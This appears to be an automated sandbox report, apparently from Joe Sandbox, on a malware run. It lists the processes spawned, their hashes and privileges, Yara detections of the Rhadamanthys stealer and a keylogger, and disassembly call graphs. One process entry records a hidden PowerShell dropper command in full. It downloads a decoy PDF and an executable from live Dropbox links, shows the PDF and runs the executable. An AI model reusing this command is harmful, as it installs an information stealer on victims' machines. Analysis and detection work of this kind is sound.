                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                                                              Start time:12:40:19
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:3
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                                                              Start time:12:40:22
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" "
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6af090000
                                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                                                              Start time:12:40:23
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                                                              Start time:12:40:23
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6552 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                                              Start time:12:40:23
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6924 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                                              Start time:12:40:24
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                                                              Start time:12:40:31
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7468 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                                                              Start time:12:40:31
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1262855704.pdf
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                                                              Start time:12:40:34
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8484 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:6
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                                                              Start time:12:40:35
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2092,i,15797820631052527623,15050807233246554643,262144 /prefetch:3
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                                                              Start time:12:40:40
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\111392827.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\111392827.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                              File size:1'843'712 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:EB40135D3E0FE985A9E09970DC09A499
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                                                              • Detection: 26%, ReversingLabs
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                                                              Start time:12:40:57
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\111392827.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\111392827.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                              File size:1'843'712 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:EB40135D3E0FE985A9E09970DC09A499
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.2631329587.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000002.2648884765.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                                                              Start time:12:40:59
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\fontdrvhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0xc60000
                                                                                                                                                                                                                                                                                              File size:676'584 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000019.00000003.2641153235.00000000030A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000019.00000002.2758285950.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.2646521849.0000000005600000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.2645361356.00000000053E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                                                                              Start time:12:41:00
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 9612 -s 472
                                                                                                                                                                                                                                                                                              Imagebase:0x170000
                                                                                                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                                                              Start time:12:41:11
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7b5950000
                                                                                                                                                                                                                                                                                              File size:827'408 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                                                                              Start time:12:41:14
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 9800 -s 144
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7263c0000
                                                                                                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                                                                              Start time:12:41:19
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6860 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2396976388.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                                                • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 00007FF848F233B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000010.00000002.2525192768.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff848f20000_powershell.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                                                                                                                                                                                                                                • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:0.4%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                Signature Coverage:8.5%
                                                                                                                                                                                                                                                                                                Total number of Nodes:82
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                                execution_graph 44250 41eff0 44251 41f024 44250->44251 44252 41f187 CreateSolidBrush 44251->44252 44253 4728a6 44252->44253 44254 41f1a9 SendMessageW 44253->44254 44255 41f211 44254->44255 44256 41f257 SetPropW SendMessageW SendMessageW 44255->44256 44258 41f2c2 44256->44258 44257 41f365 GetCurrentProcess SetPriorityClass 44259 41f373 44257->44259 44258->44257 44258->44259 44294 41fea0 44259->44294 44261 41f3b6 44357 427220 29 API calls _com_util::ConvertStringToBSTR 44261->44357 44263 41f450 44358 426dc0 EnterCriticalSection 44263->44358 44265 41f51b SendMessageW 44267 450490 44265->44267 44268 41f558 SendMessageW 44267->44268 44269 41f596 44268->44269 44359 423270 Shell_NotifyIconW 44269->44359 44271 41f5a9 44360 420830 8 API calls 44271->44360 44273 41f5ca 44361 424800 10 API calls 44273->44361 44275 41f5f5 44276 41f60b SetTimer 44275->44276 44277 41f5ff 44275->44277 44276->44277 44362 424ae0 7 API calls 44277->44362 44279 41f62b 44363 424cf0 EnterCriticalSection 44279->44363 44281 41f632 44282 41f63c SendMessageW SendMessageW 44281->44282 44283 41f666 44281->44283 44282->44283 44364 46c830 SetWindowLongW SetWindowLongW SetWindowLongW 44283->44364 44285 41f69f 44365 4262a0 6 API calls 44285->44365 44287 41f6d0 44366 46bf30 9 API calls 44287->44366 44289 41f6e7 44367 420970 36 API calls 44289->44367 44291 41f83e 44292 41f883 44291->44292 44293 41f85b SendMessageW 44291->44293 44293->44292 44295 472a98 44294->44295 44296 41fef2 LoadMenuW 44295->44296 44298 41ff03 44296->44298 44297 41ffe9 44309 420057 44297->44309 44298->44297 44300 41ff9f 44298->44300 44372 447f20 NtQueryDefaultLocale 44298->44372 44373 4444a0 ExitProcess ExitProcess 44300->44373 44310 420184 SendMessageW 44309->44310 44311 4201a2 44310->44311 44374 4152a0 GetModuleHandleW LoadLibraryW GetProcAddress GetLastError SetLastError 44311->44374 44313 4201bf 44315 420363 44313->44315 44316 420220 44313->44316 44314 4207f2 44314->44261 44315->44314 44376 445760 ExitProcess ExitProcess 44315->44376 44316->44314 44375 445760 ExitProcess ExitProcess 44316->44375 44357->44263 44358->44265 44359->44271 44360->44273 44361->44275 44362->44279 44363->44281 44364->44285 44365->44287 44366->44289 44367->44291 44374->44313 44385 451080 44386 45108c ExitProcess 44385->44386 44387 45109b 44385->44387 44389 439bce 44390 439bff 44389->44390 44391 439c6b VirtualProtect 44390->44391 44392 439ca8 44391->44392 44393 44f92b 44399 44f948 44393->44399 44395 44fcbe 44402 44fd38 44395->44402 44417 44fd24 ExitProcess ExitProcess 44395->44417 44401 44f98f VirtualProtect 44399->44401 44406 44fbc9 44399->44406 44401->44395 44405 450f9c 44402->44405 44418 450805 ExitProcess ExitProcess 44402->44418 44407 44fbee VirtualProtect 44406->44407 44409 44fcbe 44407->44409 44413 44fd38 44409->44413 44419 44fd24 ExitProcess ExitProcess 44409->44419 44416 450f9c 44413->44416 44420 450805 ExitProcess ExitProcess 44413->44420

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 00447BED Relevance: 26.8, APIs: 1, Strings: 14, Instructions: 500nativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 0 447bed-447bf8 1 447bfa-447c36 0->1 2 447c3b-447c99 0->2 5 448777-448788 NtQueryDefaultLocale 1->5 6 447cac-447cc1 2->6 7 447c9b-447ca7 2->7 10 448950-4491d6 call 448d09 call 44919b call 4491d7 5->10 11 44878e-4487e1 call 4487d3 5->11 8 447cd4-447cf3 6->8 9 447cc3-447ccf 6->9 12 447f9d-447fa4 7->12 13 447cf5-447d01 8->13 14 447d06-447d18 8->14 9->12 40 4487f2-448817 11->40 15 448078-448771 12->15 16 447faa-448035 12->16 13->12 19 447d1a-447d26 14->19 20 447d2b-447d94 14->20 15->5 16->15 34 448037-448073 16->34 19->12 32 447f91-447f97 20->32 33 447d9a-447e06 20->33 32->12 41 447ea7-447f8a 33->41 42 447e0c-447e1c 33->42 34->5 49 448824 40->49 50 448819-448822 40->50 41->12 42->41 46 447e22-447e5b call 447e4a 42->46 46->41 55 448853-4488de call 4488be 49->55 56 4487e3-4487ec 49->56 50->55 66 4488ef-448914 55->66 56->40 70 448916-44891f 66->70 71 448921 66->71 70->10 71->10 73 4488e0-4488e9 71->73 73->66
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00448780
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
